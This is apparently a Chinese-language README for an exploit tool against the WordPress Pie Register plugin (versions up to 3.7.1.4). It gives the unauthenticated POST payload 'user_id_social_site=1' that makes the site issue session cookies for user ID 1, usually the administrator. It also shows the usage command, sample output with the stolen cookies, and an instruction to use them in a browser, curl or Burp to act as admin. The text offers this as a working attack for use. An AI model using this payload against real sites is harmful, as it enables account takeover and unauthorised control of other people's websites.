Mrj Haxcore
WordPress 的 Pie Register 插件(版本 ≤ 3.7.1.4)暴露了一个未认证的端点,攻击者只需 POST 一个特定的负载即可 劫持管理员会话。
利用该漏洞可 窃取用户 ID 1(通常为 admin)的会话 cookies,无需任何登录凭据。
user_id_social_site=1
当 POST 到根 URL (/) 时,该参数会导致插件将攻击者认证为 ID 1(通常为 admin)的用户,并签发有效的会话 cookies。
requests, beautifulsoup4(可选,用于 cookie 解析)python3 pie.py http://target.site
输出 [*] 正在发送负载以劫持管理员会话...
[+] 成功劫持 user_id=1(admin)的 cookies: wordpress_sec_xxxxxx = <cookie_value> wordpress_logged_in_xxxxxx = <cookie_value>
[!] 请在浏览器或 curl、Burp 等工具中使用这些 cookies 以管理员身份操作。